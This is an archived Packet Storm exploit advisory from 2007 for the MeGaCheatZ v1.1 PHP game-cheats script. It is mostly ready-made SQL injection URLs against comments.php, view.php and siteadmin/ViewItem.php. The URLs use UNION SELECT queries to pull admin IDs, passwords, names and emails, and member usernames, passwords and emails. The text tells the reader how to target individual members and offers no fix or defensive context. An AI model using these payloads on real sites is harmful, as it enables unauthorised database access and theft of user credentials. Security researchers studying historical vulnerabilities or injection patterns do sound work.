megacheatz-sql.txt

2007-12-24T00:00:00
ID PACKETSTORM:62030
Type packetstorm
Reporter MhZ91
Modified 2007-12-24T00:00:00

Description

                                        
                                            `---------------------------------------------------------------  
____ __________ __ ____ __   
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_   
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\  
| | | \ | |/ \ \___| | /_____/ | || |   
|___|___| /\__| /______ /\___ >__| |___||__|   
\/\______| \/ \/   
---------------------------------------------------------------  
  
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org   
  
---------------------------------------------------------------  
  
Multiple Remote Sql Injection  
  
---------------------------------------------------------------  
  
# Author: MhZ91   
# Title: MeGaCheatZ v1.1 - Remote Sql Injection  
# Download: http://scriptmafia.org/2007/12/19/megacheatz_1.1.html  
# Bug: Remote Sql Injection   
# Visit: http://www.inj3ct-it.org  
# Info: MeGaCheatZ v1.1 is a full-fledged computer game cheats script. This script could VERY EASILY be an entire web-site. It's 100% cgi/php/template driven. It contains a script that will pull all of the latest PC games cheats FOR you! It also has manual submission and removal! This script does ALL of the work for you. Visitors can even search for specific games!  
  
---------------------------------------------------------------  
  
http://[site]/comments.php?ItemID=-1+union+select+concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail)+from+dd_admin/*  
  
http://[site]/view.php?ItemID='+union+select+1,2,3,4,concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail),6,7,8,9,10+from+dd_admin/*  
  
http://[site]/siteadmin/ViewItem.php?ItemID='+union+select+1,2,3,4,concat(AdminID,char(58),AdminPass,char(58),AdminName,char(58),AdminEmail),6,7,8,9,10,11,12,13,14,15,16,17,18+from+dd_admin/*  
  
And other more...   
  
Whit this u get AdminID:AdminPass:AdminName:AdminEmail   
  
If u want get username:password:email of members, use this  
  
http://[site]/comments.php?ItemID=-1+union+select+concat(username,char(58),password,char(58),email)+from+dd_users+where+UserID=[UserID]/*  
  
http://[site]/view.php?ItemID='+union+select+1,2,3,4,concat(username,char(58),password,char(58),email),6,7,8,9,10+from+dd_users+where+UserID=[UserID]/*  
  
http://[site]/siteadmin/ViewItem.php?ItemID='+union+select+1,2,3,4,concat(username,char(58),password,char(58),email),6,7,8,9,10,11,12,13,14,15,16,17,18+from+dd_users+where+UserID=[UserID]/*  
  
And change [UserID] whit number id of member..   
  
Bye.. visit http://www.inj3ct-it.org !!  
  
---------------------------------------------------------------  
`